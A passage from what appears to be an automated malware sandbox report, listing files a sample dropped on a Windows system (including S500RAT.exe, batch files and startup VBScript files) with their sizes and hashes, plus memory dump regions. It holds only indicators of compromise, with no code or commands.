                                                                      ae15e88abe48b53a953373b5693778b7e3234af2fbd08dc1267c46b43ca74a7137a5cae5709e55db383d046fa2738080d663d8c51a5a180f53d204417e939019

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                      Filesize

                                                                      873B

                                                                      MD5

                                                                      c935c6fabb5626da19583c86c2d8186a

                                                                      SHA1

                                                                      c44a6ee1f0fdfbedb7609a454a9bc44045974934

                                                                      SHA256

                                                                      1c55a2d1ebfbfb3cd752033dcb42dfaad3a7e5501b493661d0704fcc07bf4225

                                                                      SHA512

                                                                      8cf16ccdf3a6abb79439b8bc471f51b6857f33592c8f023740f4f1ebdd4d9b0b6d2920f403fa12800a6a7a02e04d599472b3a5b2d132d6bc72ad7a55367dda8c

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      00a1ca24365089915a673dc707d0c078

                                                                      SHA1

                                                                      9417cc8e090f93fecb40d664d3dd045824d18f19

                                                                      SHA256

                                                                      7115f195c42fb73beb989fd57bdcc37fcd82395fbb5eae5593fd6977d1a47beb

                                                                      SHA512

                                                                      2d009deca6506287477731a75a7358411c8a01b9a53b191fd5dc5bb997c322278c41859643c2365a9b18a2e29c42b3e254f5621ee11dee08d47790de094b0fc9

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                      Filesize

                                                                      538B

                                                                      MD5

                                                                      a0e33508f86695866bd8c31883f97b7e

                                                                      SHA1

                                                                      a8cbaa235b3dddf74cf0df7fb16ca8e4cb97b5bf

                                                                      SHA256

                                                                      5ece769375c8dc2fc6d25b7455285f2dad4194089fc1356aa0f75ed4eea380f1

                                                                      SHA512

                                                                      59c3ba1bd34f97cfca05d209ddaa3b2f56e6cee6e9c7b344103a7c0800c81c9b8717aa24d7f59fff62977ce14ea795dc28f5799b63251b1f198bb56636f54601

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581c8c.TMP

                                                                      Filesize

                                                                      538B

                                                                      MD5

                                                                      db241d76a6d0ecb57162abbdb60b778e

                                                                      SHA1

                                                                      e782a0c36952198e73dce9ef9014fbe1e390e1a4

                                                                      SHA256

                                                                      ce0ed44ddbf79de22ddd50cf1a7b1e07f9e079f3d8d26f0bd90685f1ceb50e37

                                                                      SHA512

                                                                      9cda9d467aa50a53a4f66f50d963c7a4639a7687fae19a37b0cf95e21c344fa37fc413e9761d346e204b01c6520b52f204722e6aa32c27259488d73a71a1c448

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                      Filesize

                                                                      16B

                                                                      MD5

                                                                      6752a1d65b201c13b62ea44016eb221f

                                                                      SHA1

                                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                      SHA256

                                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                      SHA512

                                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      90e6c6d083668d6bcbd3e110d950e82d

                                                                      SHA1

                                                                      6daff0d82110a891e7d8cebd172ef95b1f0df4e7

                                                                      SHA256

                                                                      0de5b28599a7d1bd3dc93d08f7d7e09683fa66859417c6255805b852b42b2cd2

                                                                      SHA512

                                                                      594cf32e2273a0179d6af478d2e0e8c1a9fbcedb4551a8c208166e7909c66d08d49fb647abc556c6bf70e27430b5dfac782b4191afb86923a67cf2bbad4fa6e6

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                      Filesize

                                                                      12KB

                                                                      MD5

                                                                      8061ab2e4c7239fedad8220159e622ee

                                                                      SHA1

                                                                      0d2c33ed40ca0e9fcff282ee9cd7942d76784246

                                                                      SHA256

                                                                      52610b4a934ae043e6f40e3c6ef8bdd08db5dcdb493bcd0581baaa94252a0ce9

                                                                      SHA512

                                                                      dbc0f136e6c657cb8e696bf0827a7b8b12bbaa74637e926e2e4a2091d903c51b37cb746c78e9f2cb9d6c7cfede5329d3b9f6efaaab560f32b57a8ed3b81b3449

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      ee9f1be5d4d351a5c376b370adcf0eea

                                                                      SHA1

                                                                      1779cecfb13c6a2f0f2813ae65d0d91ebdcf5583

                                                                      SHA256

                                                                      70600f0f93bca5f0548bfe5503513caadda31cbcd14dc007824b0925a8626e4b

                                                                      SHA512

                                                                      fda7345f64a6352e99bb3f5d94e58751a71d45a27147f60da32d12ff0307dbe416f482f1b9950e52ce63cbb5f0e5c1647f72dbb7a05c5419ccd8b7980ea86754

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      d8cb3e9459807e35f02130fad3f9860d

                                                                      SHA1

                                                                      5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                      SHA256

                                                                      2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                      SHA512

                                                                      045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      5bf7444688a776dadb33aceb9c99acc2

                                                                      SHA1

                                                                      67eb4db9abb90713d6b274074e6b9fab1652d130

                                                                      SHA256

                                                                      73a471ba596ebd2a6918de47da809f1159867be755dfd99d9a6b73cc53c0fc52

                                                                      SHA512

                                                                      5af160e93582509308f43a9a4296fa30df4dc6e774b7009643cccb5ab83cfe3cc2b8f559897538e40401c1f3a2e0eb48996124617753615d9d85581e452bab63

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      a882b8f1619d04e95bae830cdb583b2d

                                                                      SHA1

                                                                      ea3db4af4a47acafbb5d84ede6d4769c2f5fb8e5

                                                                      SHA256

                                                                      99c9e6bce1b5b1bb8f3ad9fe895d0c4b57b20be319e058a889dd62fdd096ca0b

                                                                      SHA512

                                                                      9e976ed9a25fe0f994aad337e0b242211bd3eb26b6763fbdd94e10fe8b0d4a6db59ec50668ce2cd104b8b678a1e4c82a04a49f21e7e56289fe542b3740ea8384

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      eee75e0eaf6bb0fc6beb1a80aee22fb2

                                                                      SHA1

                                                                      aa31f7071dd17a75bb2ba36e3ce1e3daa302efb0

                                                                      SHA256

                                                                      48997e32cfb259140ebb950f9312c2b7e294680961820b5ad3b0ab31a310d53b

                                                                      SHA512

                                                                      80e78af37f2d48ab513091e89d2a8f64d99ac6ce017ad3e6136b344d423345585db70ba840965951b05f40aaacb90ed57f4609a53ff9dabfc36af6a049b74522

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      09f7f1bf256ef01cf503cf9508638f61

                                                                      SHA1

                                                                      97afc64d2c53287128aca69a88fb6f1df7926893

                                                                      SHA256

                                                                      e0c210ac2da80ecce00a9e0946ea4aeace691abf92d246bcf090e8cdf673792a

                                                                      SHA512

                                                                      4e167188cfa132a057c6a090f389a245d6b6978584511750e01efeeb53e9e50f05c28d1c992330dbc6fa07937521f638b52f887185614af96d8c0584ae94b192

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      414a32fff5d2f4785c2c0541610e2efa

                                                                      SHA1

                                                                      cdb28423c92d7de9ca2311d2d1adcd42417e1312

                                                                      SHA256

                                                                      c71e4ed04a5f9632319337e721be3055d3d965abc40d7c34d9b48b44fa287fcf

                                                                      SHA512

                                                                      c3af445797cd9707413d9d0f15a4901e17bbbabbda7e2c1ebeb16155b91e37444fb0bf71e062aa5ce54f259ea445aef561c436dd9d56c529c07db1f38ecca83f

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      2979eabc783eaca50de7be23dd4eafcf

                                                                      SHA1

                                                                      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                                                      SHA256

                                                                      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                                                      SHA512

                                                                      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                                                    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

                                                                      Filesize

                                                                      18.8MB

                                                                      MD5

                                                                      017ab96e80048ff5c16c045f0b07dd5c

                                                                      SHA1

                                                                      81d29230438596bc35d5c20a3c5077c6f6bf286a

                                                                      SHA256

                                                                      baf65c88b4d48cb3701f9dc503f9800e06b490e169c8f3668f250052c703ee62

                                                                      SHA512

                                                                      8a2fb18187f6432a4c266de6dbda7b98d1838838a73dc9a593d2f814336d5842ea3ce101a60714aabc735390560b6c61e66166c0a643646c7e5aa994c59f2987

                                                                    • C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat

                                                                      Filesize

                                                                      262KB

                                                                      MD5

                                                                      ad0c8112fc6de16730b2c05452bd5a5d

                                                                      SHA1

                                                                      de5c18c8b52136d3f36eb309d2cab5a94217b80f

                                                                      SHA256

                                                                      3ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7

                                                                      SHA512

                                                                      5d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780

                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lgqq1ge.4rf.ps1

                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                    • C:\Users\Admin\AppData\Local\Temp\invoicer.bat

                                                                      Filesize

                                                                      284KB

                                                                      MD5

                                                                      f4d1ac2353407590dd8f02cac6b2104a

                                                                      SHA1

                                                                      9681117cd8ea67bc8b3907004e9ce808ca0187ec

                                                                      SHA256

                                                                      3c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7

                                                                      SHA512

                                                                      7d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082

                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp1F89.tmp.bat

                                                                      Filesize

                                                                      141B

                                                                      MD5

                                                                      15642d5ccea641eb0ad72b252a02a3a4

                                                                      SHA1

                                                                      dc700b62adcc2b8e4d889a49f543e0ca01ac3664

                                                                      SHA256

                                                                      b42ebfc2bec249e5fbdbce27d601bd15f69957ca54cfefbb6ebc90759624ec70

                                                                      SHA512

                                                                      198e5314a8e5d346cacb36218fc2153a4f9fe79052f1f99fd2c842e7ece7a0263d79f03656db8162e255d8ee45079365da0db066ee51a6108ffcec13229fe5fa

                                                                    • C:\Users\Admin\AppData\Local\del.bat

                                                                      Filesize

                                                                      56B

                                                                      MD5

                                                                      f62904abb27a3574e2e6121349ab4955

                                                                      SHA1

                                                                      35b3504f1d6bc88638a0721cf3d898eb0f95092a

                                                                      SHA256

                                                                      d31225722321313554e736bcd9debc4cb4c5ed6dce3921fa7839162fede832b6

                                                                      SHA512

                                                                      e8d1cf4c6a745790b2eaf4b3618703337313e3f561ba88982bc1a139aa4b5b29fd5f78f925e5bd12669eed74ca78510f6d6b1ce091bc55299057d2b2e867fb4e

                                                                    • C:\Users\Admin\AppData\Local\system.exe

                                                                      Filesize

                                                                      315KB

                                                                      MD5

                                                                      b45c1b72aea0409ba684eb90d1e073a4

                                                                      SHA1

                                                                      05627c3cc453a27b8250ef9a92392941445f674b

                                                                      SHA256

                                                                      47c7599d077e92e10bc6385a75caa5072a4f9047b29a9eb8311054074342ebb0

                                                                      SHA512

                                                                      03ebffec9fc19fdcee5fb62d28d99077d88d896e51cbb294b721ad5ad52787b47c3ad707f1ed36035e07bca72ac7cf78061fa2f0cecb537061da1e6b494cfe59

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_456.vbs

                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      9f11c16c515ae27f990473c3ecff1919

                                                                      SHA1

                                                                      a714b3dadfa36d681541244a48602374f4d852b4

                                                                      SHA256

                                                                      2b8d0cc4879b12064f3b172ed203fd5218d720c40df4090c40b7b20e7363f6dc

                                                                      SHA512

                                                                      68de8afd741af239388e47ced16eb47c38a1f364515b5641e924bfc695afab30bd3dde02327b6582332da1317482bca9b794f816d6b49a55fc26ad35268d2458

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_609.vbs

                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      c8e10ecb13a214e27f31866da01caadb

                                                                      SHA1

                                                                      67a409de14c52cf9a01ea07ff1331d3f133e3e73

                                                                      SHA256

                                                                      a0d717b8c91daefd47f150b02067623d76a58afe731d559eea26787376d696b2

                                                                      SHA512

                                                                      9b456034a2309ddeb40da6546656c00b89c6416347222be16fa9d27f4f24c541e3ef2274ca3c99210821154efc00d5a316060e4e9e01be86c1b8ed68ef628607

                                                                    • C:\Users\Admin\AppData\Roaming\startup_str_684.vbs

                                                                      Filesize

                                                                      115B

                                                                      MD5

                                                                      8b2869f98d77b5ff664c0f31463e67df

                                                                      SHA1

                                                                      ef3bf3ae2d4585c0307740286c30a46d917fd5a2

                                                                      SHA256

                                                                      8295c7dfacd93d01e78c05c7974684344d6089f72774fecf64f7493f50c4f6e2

                                                                      SHA512

                                                                      a8858f0b2d2fa0656ee4c5f63cb73902246c1c25b1078a54e4d798000ee9dc8d9d1b3204119f2564201b8d57871d7f7601443f521c57dd642019423d82be754d

                                                                    • C:\Users\Admin\Downloads\Unconfirmed 619232.crdownload

                                                                      Filesize

                                                                      315KB

                                                                      MD5

                                                                      9f8bc96c96d43ecb69f883388d228754

                                                                      SHA1

                                                                      61ed25a706afa2f6684bb4d64f69c5fb29d20953

                                                                      SHA256

                                                                      7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

                                                                      SHA512

                                                                      550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

                                                                    • C:\Users\Admin\system\system.exe

                                                                      Filesize

                                                                      442KB

                                                                      MD5

                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                      SHA1

                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                      SHA256

                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                      SHA512

                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                    • memory/1604-38-0x0000000000940000-0x0000000001C0A000-memory.dmp

                                                                      Filesize

                                                                      18.8MB

                                                                    • memory/2132-86-0x00007FFE84A90000-0x00007FFE85551000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2132-27-0x00007FFE84A90000-0x00007FFE85551000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2132-0-0x00007FFE84A93000-0x00007FFE84A95000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2132-1-0x00000000005F0000-0x0000000001920000-memory.dmp

                                                                      Filesize

                                                                      19.2MB

                                                                    • memory/3152-332-0x0000025E7BF80000-0x0000025E7BF96000-memory.dmp

                                                                      Filesize

                                                                      88KB

                                                                    • memory/3244-40-0x000002097E200000-0x000002097E222000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/3704-331-0x00000260C7FC0000-0x00000260C7FCE000-memory.dmp

                                                                      Filesize

                                                                      56KB

                                                                    • memory/4828-105-0x000002CB3C090000-0x000002CB3C0C8000-memory.dmp

                                                                      Filesize

                                                                      224KB

                                                                    • memory/4828-93-0x000002CB3C020000-0x000002CB3C028000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                    • memory/4956-148-0x0000020FC1CF0000-0x0000020FC1D24000-memory.dmp

                                                                      Filesize

                                                                      208KB

                                                                    • memory/4956-143-0x0000020FC1CC0000-0x0000020FC1CC8000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                    • memory/5556-655-0x0000028C7E300000-0x0000028C7E376000-memory.dmp

                                                                      Filesize

                                                                      472KB

                                                                    • memory/5556-654-0x0000028C7E2B0000-0x0000028C7E2F4000-memory.dmp

                                                                      Filesize

                                                                      272KB